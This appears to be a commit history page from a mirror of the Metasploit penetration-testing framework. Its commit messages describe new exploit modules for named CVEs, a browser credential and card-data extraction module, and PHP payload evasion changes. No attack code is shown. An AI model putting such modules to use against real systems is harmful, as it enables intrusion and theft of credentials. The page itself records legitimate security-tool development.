adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
77,971 Commits 27 Branches 1,043 Tags
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
Commit Graph

38478 Commits

Author SHA1 Message Date
Alex 1e67d200d2 Update modules/post/windows/gather/enum_browsers.rb 
Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com>
 2024-09-27 08:02:48 +02:00
jheysel-r7 94c19395f3 Merge pull request #19466 from jvoisin/singles_php 
Use php_preamble/php_system_block instead of `system` in payloads/singles/php/
 2024-09-26 20:35:40 -04:00
Chocapikk c2a803aba3 Lint 2024-09-27 01:25:37 +02:00
Chocapikk 10a4b24ed7 Better file clean 2024-09-27 01:17:07 +02:00
h00die-gr3y c43a4f4b0b Fixed cluster ID issue 2024-09-26 21:53:27 +00:00
Chocapikk 2304bde907 Add suggestions + clean database files during on_new_session 2024-09-26 23:48:51 +02:00
jheysel-r7 05ff8359b8 Merge pull request #19436 from h4x-x0r/CVE-2024-6670 
WhatsUp Gold SQL Injection (CVE-2024-6670) Module
 2024-09-26 17:04:30 -04:00
Brendan dbc020a745 Merge pull request #19441 from Takahiro-Yoko/cve_2023_0386_priv_esc 
Land #19441, Add module: Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386
 2024-09-26 14:07:17 -05:00
Alex 78f7327ea7 Update enum_browsers.rb 2024-09-26 20:49:42 +02:00
Alex 6cc6841821 Update modules/post/windows/gather/enum_browsers.rb 
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
 2024-09-26 20:44:45 +02:00
Valentin Lobstein a9901d00a9 Update modules/exploits/unix/webapp/byob_unauth_rce.rb 
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
 2024-09-26 20:24:24 +02:00
Valentin Lobstein 499a1c30b5 Update modules/exploits/unix/webapp/byob_unauth_rce.rb 
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
 2024-09-26 20:24:14 +02:00
Valentin Lobstein 96f9bf61ac Update modules/exploits/unix/webapp/byob_unauth_rce.rb 
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
 2024-09-26 20:24:02 +02:00
Alex f106f1cf2c Add enum_browsers post exploitation module 
This post-exploitation module extracts sensitive browser data from both Chromium-based and Gecko-based browsers on the target system. It supports the decryption of passwords and cookies using Windows Data Protection API (DPAPI) and can extract additional data such as browsing history, keyword search history, download history, autofill data, and credit card information.
 2024-09-26 19:21:42 +02:00
Spencer McIntyre b41caa22d9 Merge pull request #19475 from NtAlexio2/smb_modules_rport 
Allow setting the RPORT option for pipe_auditor
 2024-09-26 09:19:27 -04:00
h4x-x0r abddaf5657 Limit terminal output 
Use TICKETSTODUMP instead of n characters
 2024-09-26 05:43:55 +01:00
h4x-x0r e80c66d80a linting 2024-09-26 05:08:41 +01:00
h4x-x0r ac711e32a0 minor updates 
added report_vuln, report_service, limited console output
 2024-09-26 05:04:38 +01:00
h4x-x0r c20b1d8a03 minor fixes 
minor fixes
 2024-09-26 04:01:36 +01:00
jheysel-r7 d9f1a061b3 Merge branch 'master' into singles_php 2024-09-25 20:41:08 -04:00
jheysel-r7 256fd9c242 Merge pull request #19451 from jvoisin/phpnop 
Improve modules/nops/php/generic.rb
 2024-09-25 19:45:37 -04:00
Alex Romero 09ffbde5fe Update modules/auxiliary/scanner/smb/pipe_auditor.rb 
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
 2024-09-26 01:57:32 +03:30
Alex Romero e517aaf716 Update modules/auxiliary/scanner/smb/pipe_auditor.rb 
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
 2024-09-26 01:57:19 +03:30
Alex Romero 23f062af53 Update modules/auxiliary/scanner/smb/pipe_auditor.rb 
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
 2024-09-26 01:56:52 +03:30
jheysel-r7 456c57b031 Merge pull request #19453 from Chocapikk/vicidial_sqli 
Add VICIdial Time-based SQL Injection Module (CVE-2024-8503)
 2024-09-25 14:19:42 -04:00
h4x-x0r d4cd4aa843 added check method 
added check method
 2024-09-25 17:41:49 +01:00
h4x-x0r 174ed4ec97 minor improvements 
minor improvements
 2024-09-25 17:29:04 +01:00
h4x-x0r d391999c92 Initial draft 
Initial draft
 2024-09-25 14:06:40 +01:00
h4x-x0r ac56da3d21 CVE-2024-28987 
CVE-2024-28987
 2024-09-25 13:16:09 +01:00
NtAlexio2 e365138387 update and display correct rport 2024-09-24 16:32:02 -04:00
jheysel-r7 d11c2be4ea Merge pull request #19375 from h4x-x0r/CVE-2024-20419 
Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419) Module
 2024-09-24 12:19:54 -04:00
Takah1ro 6d541b625f Remove unnecessary shell_path 2024-09-24 08:18:30 +09:00
Takahiro Yokoyama 130f146819 Apply suggestions from code review 
Change to call setgid and setuid in the exploit before executing the payload

Co-authored-by: Brendan <bwatters@rapid7.com>
 2024-09-24 08:06:26 +09:00
Jack Heysel 8e2dbbbd56 Land #19416, Add Traccar RCE module 
This module exploits two vulnerabilities in Traccar v5.1 - v5.12 to
obtain remote code execution: A path traversal vulnerability
CVE-2024-24809 and an unrestricted file upload vulnerability
CVE-2024-31214.
 2024-09-23 15:25:02 -07:00
jheysel-r7 e0e7c67ff7 Remove jsessionid parsing now that keep_cookies is being used 2024-09-23 18:12:01 -04:00
Jack Heysel f254eeb65e Added error handling 2024-09-23 14:16:26 -07:00
Jack Heysel b475f0dccb Land #19448, Improve screensaver management 
Add a number of improvements to modules/post/multi/manage/screensaver.rb
 2024-09-23 08:31:38 -07:00
h4x-x0r 322188a112 Refactoring 
Refactored code to remove duplicate requests
 2024-09-23 13:29:46 +01:00
Chocapikk 9e6adea0dc Add BYOB Unauthenticated RCE module exploiting arbitrary file write and command injection (CVE-2024-45256, CVE-2024-45257) 2024-09-21 04:00:56 +02:00
adfoster-r7 ab7e02d23f Merge pull request #19397 from sjanusz-r7/replace-readline-with-reline 
Replace Readline with Reline
 2024-09-20 14:23:40 +01:00
h00die-gr3y 8e62f22315 fifth release with the option to use your own SSH private key 2024-09-20 09:50:13 +00:00
h00die-gr3y 8b197a60f9 fourth release addressing review comments of jheysel-r7 2024-09-19 20:54:55 +00:00
Chocapikk 0515a1d3bc Update comment 2024-09-19 22:36:07 +02:00
Chocapikk f715cc68df Randomize values + add function to delete campaign 2024-09-19 22:33:50 +02:00
NtAlexio2 48765fbfa5 allow setting the RPORT option for pipe_auditor 2024-09-19 10:43:40 -04:00
NtAlexio2 b172ef8d69 bugfix rport in smb_enumusers 2024-09-19 10:42:10 -04:00
Chocapikk ae8df6c34b Add working documentation + working exploit 2024-09-18 17:00:18 +02:00
jvoisin b7fff5926b Use php_preamble/php_system_block instead of system in payloads/singles/php/ 
The `php_preamble`/`php_system_block` combo has builtin low-hanging evasion for
PHP's `disabled_functions` configuration (eg. `system` might not be available
but `shell_exec` is), so use it instead of hardcoding `system`.

This commit also brings modules/payloads/singles/php/reverse_perl.rb's style
more in line with the other uses of `php_preamble`/`php_system_block`.

Oh, and it makes lib/msf/core/payload/php.rb work on older Ruby version as
well.

Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com>
 2024-09-18 12:40:55 +02:00
Chocapikk 005dc4941d Update (still working on it) 2024-09-17 23:50:16 +02:00
h00die-gr3y 9971aed96f third release addressing majority of the review comments 2024-09-17 19:23:38 +00:00